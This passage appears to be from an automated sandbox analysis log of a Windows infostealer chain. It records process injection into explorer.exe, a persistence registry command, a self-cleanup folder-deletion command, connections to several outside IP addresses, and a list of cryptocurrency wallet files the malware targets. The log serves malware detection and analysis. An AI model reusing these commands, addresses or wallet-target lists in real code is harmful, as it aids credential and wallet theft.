            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,15_2_00481920
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,10_2_00412220
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02E20D90 mov eax, dword ptr fs:[00000030h]0_2_02E20D90
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02E2092B mov eax, dword ptr fs:[00000030h]0_2_02E2092B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02E51E41 push dword ptr fs:[00000030h]0_2_02E51E41
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_02EE0D90 mov eax, dword ptr fs:[00000030h]4_2_02EE0D90
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_02EE092B mov eax, dword ptr fs:[00000030h]4_2_02EE092B
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_02F21241 push dword ptr fs:[00000030h]4_2_02F21241
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_049760A3 push dword ptr fs:[00000030h]9_2_049760A3
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A10042 push dword ptr fs:[00000030h]9_2_04A10042
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_049DC0A3 push dword ptr fs:[00000030h]14_2_049DC0A3
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 14_2_04A70042 push dword ptr fs:[00000030h]14_2_04A70042
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_004278D5 GetProcessHeap,10_2_004278D5
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_004329EC
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_004329BB SetUnhandledExceptionFilter,10_2_004329BB
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_004329EC
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_004329BB SetUnhandledExceptionFilter,15_2_004329BB

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\explorer.exeFile created: rujtcgu.1.drJump to dropped file
            Source: C:\Windows\explorer.exeNetwork Connect: 189.163.126.89 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 103.174.152.66 443Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 193.233.132.167 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 91.92.253.69 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 185.154.13.143 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 192.185.16.114 443Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 158.160.165.129 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 104.196.109.209 443Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 162.159.134.233 443Jump to behavior
            Source: Yara matchFile source: Process Memory Space: build2.exe PID: 7144, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: build2.exe PID: 5316, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A10110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,9_2_04A10110
            Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: B4D19A0Jump to behavior
            Source: C:\Users\user\AppData\Roaming\rujtcguThread created: unknown EIP: 7D719A0Jump to behavior
            Source: C:\Users\user\AppData\Roaming\rujtcguThread created: unknown EIP: 9CE19A0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeMemory written: C:\Users\user\AppData\Local\Temp\E609.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeMemory written: C:\Users\user\AppData\Local\Temp\E609.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeMemory written: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeMemory written: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeMemory written: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exeMemory written: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeMemory written: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\file.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
            Source: C:\Users\user\AppData\Roaming\rujtcguSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\rujtcguSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
            Source: C:\Users\user\AppData\Roaming\rujtcguSection loaded: NULL target: C:\Windows\explorer.exe protection: read write
            Source: C:\Users\user\AppData\Roaming\rujtcguSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeSection unmapped: C:\Windows\System32\conhost.exe base address: 400000
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,10_2_00419F90
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeProcess created: C:\Users\user\AppData\Local\Temp\E609.exe C:\Users\user\AppData\Local\Temp\E609.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeProcess created: C:\Users\user\AppData\Local\Temp\E609.exe "C:\Users\user\AppData\Local\Temp\E609.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeProcess created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeProcess created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeProcess created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe --Task
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeProcess created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe"
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EGIJEBGDAFHI" & exit
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeProcess created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exeProcess created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe"
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeProcess created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
            Source: explorer.exe, 0000002A.00000002.2873664959.0000000001388000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *Progman8
            Source: explorer.exe, 00000001.00000000.1690075566.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1687402593.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1688395629.0000000004CE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000001.00000000.1687402593.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2890584363.0000000005340000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000001.00000000.1687109681.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
            Source: explorer.exe, 00000001.00000000.1687402593.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000001.00000000.1687402593.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_04A380F6 cpuid 9_2_04A380F6
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,9_2_04A50AB6
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,10_2_00438178
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,10_2_00440116
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,10_2_004382A2
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: GetLocaleInfoW,_GetPrimaryLen,10_2_0043834F
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,10_2_00438423
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: EnumSystemLocalesW,10_2_004387C8
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: GetLocaleInfoW,10_2_0043884E
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,10_2_00437BB3
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: EnumSystemLocalesW,10_2_00437E27
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,10_2_00437E83
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,10_2_00437F00
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,10_2_00437F83
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,14_2_04AB0AB6
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,15_2_00438178
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,15_2_00440116
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,15_2_004382A2
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: GetLocaleInfoW,_GetPrimaryLen,15_2_0043834F
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,15_2_00438423
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: EnumSystemLocalesW,15_2_004387C8
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: GetLocaleInfoW,15_2_0043884E
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,15_2_00437BB3
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: EnumSystemLocalesW,15_2_00437E27
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,15_2_00437E83
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,15_2_00437F00
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,15_2_00437F83
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 9_2_00408E4E GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,9_2_00408E4E
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,10_2_0042FE47
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: build2.exe, 00000013.00000002.2663278860.000000000080E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 32.2.mstsca.exe.8a15a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 35.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 35.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 28.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 28.2.build3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.build3.exe.9715a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000020.00000002.2341106813.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.2873086234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.2244173274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2243427238.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1982678563.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.2343916720.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.2344075429.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1710632872.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1982993082.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1710474391.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: 19.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.build2.exe.2d915a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.build2.exe.2d915a0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000012.00000002.2109889853.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.2651384676.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: build2.exe PID: 7144, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: build2.exe PID: 5316, type: MEMORYSTR
            Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda 